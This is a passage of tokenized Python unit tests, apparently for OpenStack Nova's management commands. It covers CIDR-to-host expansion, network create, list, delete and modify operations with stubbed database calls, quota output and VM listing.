name|'result'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertIn'
op|'('
name|'str'
op|'('
name|'ip'
op|')'
op|','
name|'expected'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'address_to_hosts'
op|'='
name|'self'
op|'.'
name|'commands'
op|'.'
name|'address_to_hosts'
newline|'\n'
comment|'# /32 and /31'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'InvalidInput'
op|','
name|'address_to_hosts'
op|','
nl|'\n'
string|"'192.168.100.1/32'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'InvalidInput'
op|','
name|'address_to_hosts'
op|','
nl|'\n'
string|"'192.168.100.1/31'"
op|')'
newline|'\n'
comment|'# /30'
nl|'\n'
name|'expected'
op|'='
op|'['
string|'"192.168.100.%s"'
op|'%'
name|'i'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'1'
op|','
number|'3'
op|')'
op|']'
newline|'\n'
name|'result'
op|'='
name|'address_to_hosts'
op|'('
string|"'192.168.100.0/30'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'len'
op|'('
name|'list'
op|'('
name|'result'
op|')'
op|')'
op|')'
newline|'\n'
name|'assert_loop'
op|'('
name|'result'
op|','
name|'expected'
op|')'
newline|'\n'
comment|'# /29'
nl|'\n'
name|'expected'
op|'='
op|'['
string|'"192.168.100.%s"'
op|'%'
name|'i'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'1'
op|','
number|'7'
op|')'
op|']'
newline|'\n'
name|'result'
op|'='
name|'address_to_hosts'
op|'('
string|"'192.168.100.0/29'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'6'
op|','
name|'len'
op|'('
name|'list'
op|'('
name|'result'
op|')'
op|')'
op|')'
newline|'\n'
name|'assert_loop'
op|'('
name|'result'
op|','
name|'expected'
op|')'
newline|'\n'
comment|'# /28'
nl|'\n'
name|'expected'
op|'='
op|'['
string|'"192.168.100.%s"'
op|'%'
name|'i'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'1'
op|','
number|'15'
op|')'
op|']'
newline|'\n'
name|'result'
op|'='
name|'address_to_hosts'
op|'('
string|"'192.168.100.0/28'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'14'
op|','
name|'len'
op|'('
name|'list'
op|'('
name|'result'
op|')'
op|')'
op|')'
newline|'\n'
name|'assert_loop'
op|'('
name|'result'
op|','
name|'expected'
op|')'
newline|'\n'
comment|'# /16'
nl|'\n'
name|'result'
op|'='
name|'address_to_hosts'
op|'('
string|"'192.168.100.0/16'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'65534'
op|','
name|'len'
op|'('
name|'list'
op|'('
name|'result'
op|')'
op|')'
op|')'
newline|'\n'
comment|"# NOTE(dripton): I don't test /13 because it makes the test take 3s."
nl|'\n'
comment|'# /12 gives over a million IPs, which is ridiculous.'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'InvalidInput'
op|','
name|'address_to_hosts'
op|','
nl|'\n'
string|"'192.168.100.1/12'"
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|NetworkCommandsTestCase
dedent|''
dedent|''
name|'class'
name|'NetworkCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'NetworkCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'NetworkCommands'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'net'
op|'='
op|'{'
string|"'id'"
op|':'
number|'0'
op|','
nl|'\n'
string|"'label'"
op|':'
string|"'fake'"
op|','
nl|'\n'
string|"'injected'"
op|':'
name|'False'
op|','
nl|'\n'
string|"'cidr'"
op|':'
string|"'192.168.0.0/24'"
op|','
nl|'\n'
string|"'cidr_v6'"
op|':'
string|"'dead:beef::/64'"
op|','
nl|'\n'
string|"'multi_host'"
op|':'
name|'False'
op|','
nl|'\n'
string|"'gateway_v6'"
op|':'
string|"'dead:beef::1'"
op|','
nl|'\n'
string|"'netmask_v6'"
op|':'
string|"'64'"
op|','
nl|'\n'
string|"'netmask'"
op|':'
string|"'255.255.255.0'"
op|','
nl|'\n'
string|"'bridge'"
op|':'
string|"'fa0'"
op|','
nl|'\n'
string|"'bridge_interface'"
op|':'
string|"'fake_fa0'"
op|','
nl|'\n'
string|"'gateway'"
op|':'
string|"'192.168.0.1'"
op|','
nl|'\n'
string|"'broadcast'"
op|':'
string|"'192.168.0.255'"
op|','
nl|'\n'
string|"'dns1'"
op|':'
string|"'8.8.8.8'"
op|','
nl|'\n'
string|"'dns2'"
op|':'
string|"'8.8.4.4'"
op|','
nl|'\n'
string|"'vlan'"
op|':'
number|'200'
op|','
nl|'\n'
string|"'vlan_start'"
op|':'
number|'201'
op|','
nl|'\n'
string|"'vpn_public_address'"
op|':'
string|"'10.0.0.2'"
op|','
nl|'\n'
string|"'vpn_public_port'"
op|':'
string|"'2222'"
op|','
nl|'\n'
string|"'vpn_private_address'"
op|':'
string|"'192.168.0.2'"
op|','
nl|'\n'
string|"'dhcp_start'"
op|':'
string|"'192.168.0.3'"
op|','
nl|'\n'
string|"'project_id'"
op|':'
string|"'fake_project'"
op|','
nl|'\n'
string|"'host'"
op|':'
string|"'fake_host'"
op|','
nl|'\n'
string|"'uuid'"
op|':'
string|"'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'"
op|'}'
newline|'\n'
nl|'\n'
DECL|function|fake_network_get_by_cidr
name|'def'
name|'fake_network_get_by_cidr'
op|'('
name|'context'
op|','
name|'cidr'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'context'
op|'.'
name|'to_dict'
op|'('
op|')'
op|'['
string|"'is_admin'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'cidr'
op|','
name|'self'
op|'.'
name|'fake_net'
op|'['
string|"'cidr'"
op|']'
op|')'
newline|'\n'
name|'return'
name|'db_fakes'
op|'.'
name|'FakeModel'
op|'('
name|'dict'
op|'('
name|'test_network'
op|'.'
name|'fake_network'
op|','
nl|'\n'
op|'**'
name|'self'
op|'.'
name|'fake_net'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_network_get_by_uuid
dedent|''
name|'def'
name|'fake_network_get_by_uuid'
op|'('
name|'context'
op|','
name|'uuid'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'context'
op|'.'
name|'to_dict'
op|'('
op|')'
op|'['
string|"'is_admin'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'uuid'
op|','
name|'self'
op|'.'
name|'fake_net'
op|'['
string|"'uuid'"
op|']'
op|')'
newline|'\n'
name|'return'
name|'db_fakes'
op|'.'
name|'FakeModel'
op|'('
name|'dict'
op|'('
name|'test_network'
op|'.'
name|'fake_network'
op|','
nl|'\n'
op|'**'
name|'self'
op|'.'
name|'fake_net'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_network_update
dedent|''
name|'def'
name|'fake_network_update'
op|'('
name|'context'
op|','
name|'network_id'
op|','
name|'values'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'context'
op|'.'
name|'to_dict'
op|'('
op|')'
op|'['
string|"'is_admin'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'network_id'
op|','
name|'self'
op|'.'
name|'fake_net'
op|'['
string|"'id'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'values'
op|','
name|'self'
op|'.'
name|'fake_update_value'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'fake_network_get_by_cidr'
op|'='
name|'fake_network_get_by_cidr'
newline|'\n'
name|'self'
op|'.'
name|'fake_network_get_by_uuid'
op|'='
name|'fake_network_get_by_uuid'
newline|'\n'
name|'self'
op|'.'
name|'fake_network_update'
op|'='
name|'fake_network_update'
newline|'\n'
nl|'\n'
DECL|member|test_create
dedent|''
name|'def'
name|'test_create'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
nl|'\n'
DECL|function|fake_create_networks
indent|' '
name|'def'
name|'fake_create_networks'
op|'('
name|'obj'
op|','
name|'context'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'context'
op|'.'
name|'to_dict'
op|'('
op|')'
op|'['
string|"'is_admin'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'label'"
op|']'
op|','
string|"'Test'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'cidr'"
op|']'
op|','
string|"'10.2.0.0/24'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'kwargs'
op|'['
string|"'multi_host'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'num_networks'"
op|']'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'network_size'"
op|']'
op|','
number|'256'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'vlan'"
op|']'
op|','
number|'200'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'vlan_start'"
op|']'
op|','
number|'201'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'vpn_start'"
op|']'
op|','
number|'2000'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'cidr_v6'"
op|']'
op|','
string|"'fd00:2::/120'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'gateway'"
op|']'
op|','
string|"'10.2.0.1'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'gateway_v6'"
op|']'
op|','
string|"'fd00:2::22'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'bridge'"
op|']'
op|','
string|"'br200'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'bridge_interface'"
op|']'
op|','
string|"'eth0'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'dns1'"
op|']'
op|','
string|"'8.8.8.8'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'kwargs'
op|'['
string|"'dns2'"
op|']'
op|','
string|"'8.8.4.4'"
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'flags'
op|'('
name|'network_manager'
op|'='
string|"'nova.network.manager.VlanManager'"
op|')'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'network'
name|'import'
name|'manager'
name|'as'
name|'net_manager'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'net_manager'
op|'.'
name|'VlanManager'
op|','
string|"'create_networks'"
op|','
nl|'\n'
name|'fake_create_networks'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'create'
op|'('
nl|'\n'
name|'label'
op|'='
string|"'Test'"
op|','
nl|'\n'
name|'cidr'
op|'='
string|"'10.2.0.0/24'"
op|','
nl|'\n'
name|'num_networks'
op|'='
number|'1'
op|','
nl|'\n'
name|'network_size'
op|'='
number|'256'
op|','
nl|'\n'
name|'multi_host'
op|'='
string|"'F'"
op|','
nl|'\n'
name|'vlan'
op|'='
number|'200'
op|','
nl|'\n'
name|'vlan_start'
op|'='
number|'201'
op|','
nl|'\n'
name|'vpn_start'
op|'='
number|'2000'
op|','
nl|'\n'
name|'cidr_v6'
op|'='
string|"'fd00:2::/120'"
op|','
nl|'\n'
name|'gateway'
op|'='
string|"'10.2.0.1'"
op|','
nl|'\n'
name|'gateway_v6'
op|'='
string|"'fd00:2::22'"
op|','
nl|'\n'
name|'bridge'
op|'='
string|"'br200'"
op|','
nl|'\n'
name|'bridge_interface'
op|'='
string|"'eth0'"
op|','
nl|'\n'
name|'dns1'
op|'='
string|"'8.8.8.8'"
op|','
nl|'\n'
name|'dns2'
op|'='
string|"'8.8.4.4'"
op|','
nl|'\n'
name|'uuid'
op|'='
string|"'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_list
dedent|''
name|'def'
name|'test_list'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
nl|'\n'
DECL|function|fake_network_get_all
indent|' '
name|'def'
name|'fake_network_get_all'
op|'('
name|'context'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
op|'['
name|'db_fakes'
op|'.'
name|'FakeModel'
op|'('
name|'self'
op|'.'
name|'net'
op|')'
op|']'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.network_get_all'"
op|','
name|'fake_network_get_all'
op|')'
newline|'\n'
name|'output'
op|'='
name|'StringIO'
op|'('
op|')'
newline|'\n'
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'output'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'list'
op|'('
op|')'
newline|'\n'
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'sys'
op|'.'
name|'__stdout__'
newline|'\n'
name|'result'
op|'='
name|'output'
op|'.'
name|'getvalue'
op|'('
op|')'
newline|'\n'
name|'_fmt'
op|'='
string|'"\\t"'
op|'.'
name|'join'
op|'('
op|'['
string|'"%(id)-5s"'
op|','
string|'"%(cidr)-18s"'
op|','
string|'"%(cidr_v6)-15s"'
op|','
nl|'\n'
string|'"%(dhcp_start)-15s"'
op|','
string|'"%(dns1)-15s"'
op|','
string|'"%(dns2)-15s"'
op|','
nl|'\n'
string|'"%(vlan)-15s"'
op|','
string|'"%(project_id)-15s"'
op|','
string|'"%(uuid)-15s"'
op|']'
op|')'
newline|'\n'
name|'head'
op|'='
name|'_fmt'
op|'%'
op|'{'
string|"'id'"
op|':'
string|"'id'"
op|','
nl|'\n'
string|"'cidr'"
op|':'
string|"'IPv4'"
op|','
nl|'\n'
string|"'cidr_v6'"
op|':'
string|"'IPv6'"
op|','
nl|'\n'
string|"'dhcp_start'"
op|':'
string|"'start address'"
op|','
nl|'\n'
string|"'dns1'"
op|':'
string|"'DNS1'"
op|','
nl|'\n'
string|"'dns2'"
op|':'
string|"'DNS2'"
op|','
nl|'\n'
string|"'vlan'"
op|':'
string|"'VlanID'"
op|','
nl|'\n'
string|"'project_id'"
op|':'
string|"'project'"
op|','
nl|'\n'
string|"'uuid'"
op|':'
string|'"uuid"'
op|'}'
newline|'\n'
name|'body'
op|'='
name|'_fmt'
op|'%'
op|'{'
string|"'id'"
op|':'
name|'self'
op|'.'
name|'net'
op|'['
string|"'id'"
op|']'
op|','
nl|'\n'
string|"'cidr'"
op|':'
name|'self'
op|'.'
name|'net'
op|'['
string|"'cidr'"
op|']'
op|','
nl|'\n'
string|"'cidr_v6'"
op|':'
name|'self'
op|'.'
name|'net'
op|'['
string|"'cidr_v6'"
op|']'
op|','
nl|'\n'
string|"'dhcp_start'"
op|':'
name|'self'
op|'.'
name|'net'
op|'['
string|"'dhcp_start'"
op|']'
op|','
nl|'\n'
string|"'dns1'"
op|':'
name|'self'
op|'.'
name|'net'
op|'['
string|"'dns1'"
op|']'
op|','
nl|'\n'
string|"'dns2'"
op|':'
name|'self'
op|'.'
name|'net'
op|'['
string|"'dns2'"
op|']'
op|','
nl|'\n'
string|"'vlan'"
op|':'
name|'self'
op|'.'
name|'net'
op|'['
string|"'vlan'"
op|']'
op|','
nl|'\n'
string|"'project_id'"
op|':'
name|'self'
op|'.'
name|'net'
op|'['
string|"'project_id'"
op|']'
op|','
nl|'\n'
string|"'uuid'"
op|':'
name|'self'
op|'.'
name|'net'
op|'['
string|"'uuid'"
op|']'
op|'}'
newline|'\n'
name|'answer'
op|'='
string|"'%s\\n%s\\n'"
op|'%'
op|'('
name|'head'
op|','
name|'body'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'result'
op|','
name|'answer'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_delete
dedent|''
name|'def'
name|'test_delete'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'fake_net'
op|'='
name|'self'
op|'.'
name|'net'
newline|'\n'
name|'self'
op|'.'
name|'fake_net'
op|'['
string|"'project_id'"
op|']'
op|'='
name|'None'
newline|'\n'
name|'self'
op|'.'
name|'fake_net'
op|'['
string|"'host'"
op|']'
op|'='
name|'None'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.network_get_by_uuid'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'fake_network_get_by_uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_network_delete_safe
name|'def'
name|'fake_network_delete_safe'
op|'('
name|'context'
op|','
name|'network_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'context'
op|'.'
name|'to_dict'
op|'('
op|')'
op|'['
string|"'is_admin'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'network_id'
op|','
name|'self'
op|'.'
name|'fake_net'
op|'['
string|"'id'"
op|']'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.network_delete_safe'"
op|','
name|'fake_network_delete_safe'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'delete'
op|'('
name|'uuid'
op|'='
name|'self'
op|'.'
name|'fake_net'
op|'['
string|"'uuid'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_delete_by_cidr
dedent|''
name|'def'
name|'test_delete_by_cidr'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'fake_net'
op|'='
name|'self'
op|'.'
name|'net'
newline|'\n'
name|'self'
op|'.'
name|'fake_net'
op|'['
string|"'project_id'"
op|']'
op|'='
name|'None'
newline|'\n'
name|'self'
op|'.'
name|'fake_net'
op|'['
string|"'host'"
op|']'
op|'='
name|'None'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.network_get_by_cidr'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'fake_network_get_by_cidr'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_network_delete_safe
name|'def'
name|'fake_network_delete_safe'
op|'('
name|'context'
op|','
name|'network_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'context'
op|'.'
name|'to_dict'
op|'('
op|')'
op|'['
string|"'is_admin'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'network_id'
op|','
name|'self'
op|'.'
name|'fake_net'
op|'['
string|"'id'"
op|']'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.network_delete_safe'"
op|','
name|'fake_network_delete_safe'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'delete'
op|'('
name|'fixed_range'
op|'='
name|'self'
op|'.'
name|'fake_net'
op|'['
string|"'cidr'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_test_modify_base
dedent|''
name|'def'
name|'_test_modify_base'
op|'('
name|'self'
op|','
name|'update_value'
op|','
name|'project'
op|','
name|'host'
op|','
name|'dis_project'
op|'='
name|'None'
op|','
nl|'\n'
name|'dis_host'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'fake_net'
op|'='
name|'self'
op|'.'
name|'net'
newline|'\n'
name|'self'
op|'.'
name|'fake_update_value'
op|'='
name|'update_value'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.network_get_by_cidr'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'fake_network_get_by_cidr'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.network_update'"
op|','
name|'self'
op|'.'
name|'fake_network_update'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'modify'
op|'('
name|'self'
op|'.'
name|'fake_net'
op|'['
string|"'cidr'"
op|']'
op|','
name|'project'
op|'='
name|'project'
op|','
name|'host'
op|'='
name|'host'
op|','
nl|'\n'
name|'dis_project'
op|'='
name|'dis_project'
op|','
name|'dis_host'
op|'='
name|'dis_host'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_modify_associate
dedent|''
name|'def'
name|'test_modify_associate'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_modify_base'
op|'('
name|'update_value'
op|'='
op|'{'
string|"'project_id'"
op|':'
string|"'test_project'"
op|','
nl|'\n'
string|"'host'"
op|':'
string|"'test_host'"
op|'}'
op|','
nl|'\n'
name|'project'
op|'='
string|"'test_project'"
op|','
name|'host'
op|'='
string|"'test_host'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_modify_unchanged
dedent|''
name|'def'
name|'test_modify_unchanged'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_modify_base'
op|'('
name|'update_value'
op|'='
op|'{'
op|'}'
op|','
name|'project'
op|'='
name|'None'
op|','
name|'host'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_modify_disassociate
dedent|''
name|'def'
name|'test_modify_disassociate'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_modify_base'
op|'('
name|'update_value'
op|'='
op|'{'
string|"'project_id'"
op|':'
name|'None'
op|','
string|"'host'"
op|':'
name|'None'
op|'}'
op|','
nl|'\n'
name|'project'
op|'='
name|'None'
op|','
name|'host'
op|'='
name|'None'
op|','
name|'dis_project'
op|'='
name|'True'
op|','
nl|'\n'
name|'dis_host'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|NeutronV2NetworkCommandsTestCase
dedent|''
dedent|''
name|'class'
name|'NeutronV2NetworkCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'NeutronV2NetworkCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'use_neutron'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'NetworkCommands'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create
dedent|''
name|'def'
name|'test_create'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'self'
op|'.'
name|'commands'
op|'.'
name|'create'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_list
dedent|''
name|'def'
name|'test_list'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'self'
op|'.'
name|'commands'
op|'.'
name|'list'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_delete
dedent|''
name|'def'
name|'test_delete'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'self'
op|'.'
name|'commands'
op|'.'
name|'delete'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_modify
dedent|''
name|'def'
name|'test_modify'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'self'
op|'.'
name|'commands'
op|'.'
name|'modify'
op|'('
string|"'192.168.0.1'"
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ProjectCommandsTestCase
dedent|''
dedent|''
name|'class'
name|'ProjectCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'TestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'ProjectCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'ProjectCommands'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_quota
dedent|''
name|'def'
name|'test_quota'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'output'
op|'='
name|'StringIO'
op|'('
op|')'
newline|'\n'
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'output'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'quota'
op|'('
name|'project_id'
op|'='
string|"'admin'"
op|','
nl|'\n'
name|'key'
op|'='
string|"'instances'"
op|','
nl|'\n'
name|'value'
op|'='
string|"'unlimited'"
op|','
nl|'\n'
op|')'
newline|'\n'
nl|'\n'
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'sys'
op|'.'
name|'__stdout__'
newline|'\n'
name|'result'
op|'='
name|'output'
op|'.'
name|'getvalue'
op|'('
op|')'
newline|'\n'
name|'print_format'
op|'='
string|'"%-36s %-10s"'
op|'%'
op|'('
string|"'instances'"
op|','
string|"'unlimited'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
name|'print_format'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_quota_update_invalid_key
dedent|''
name|'def'
name|'test_quota_update_invalid_key'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'self'
op|'.'
name|'commands'
op|'.'
name|'quota'
op|'('
string|"'admin'"
op|','
string|"'volumes1'"
op|','
string|"'10'"
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|VmCommandsTestCase
dedent|''
dedent|''
name|'class'
name|'VmCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'VmCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'VmCommands'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'fake_flavor'
op|'='
name|'objects'
op|'.'
name|'Flavor'
op|'('
op|'**'
name|'test_flavors'
op|'.'
name|'DEFAULT_FLAVORS'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_list_without_host
dedent|''
name|'def'
name|'test_list_without_host'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'output'
op|'='
name|'StringIO'
op|'('
op|')'
newline|'\n'
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'output'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'objects'
op|'.'
name|'InstanceList'
op|','
string|"'get_by_filters'"
op|')'
name|'as'
name|'get'
op|':'
newline|'\n'
indent|' '
name|'get'
op|'.'
name|'return_value'
op|'='
name|'objects'
op|'.'
name|'InstanceList'
op|'('
nl|'\n'
name|'objects'
op|'='
op|'['
name|'fake_instance'
op|'.'
name|'fake_instance_obj'
op|'('
nl|'\n'
name|'context'
op|'.'
name|'get_admin_context'
op|'('
op|')'
op|','
name|'host'
op|'='
string|"'foo-host'"
op|','
nl|'\n'
name|'flavor'
op|'='
name|'self'
op|'.'
name|'fake_flavor'
op|','
nl|'\n'
name|'system_metadata'
op|'='
op|'{'
op|'}'
op|')'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'list'
op|'('
op|')'
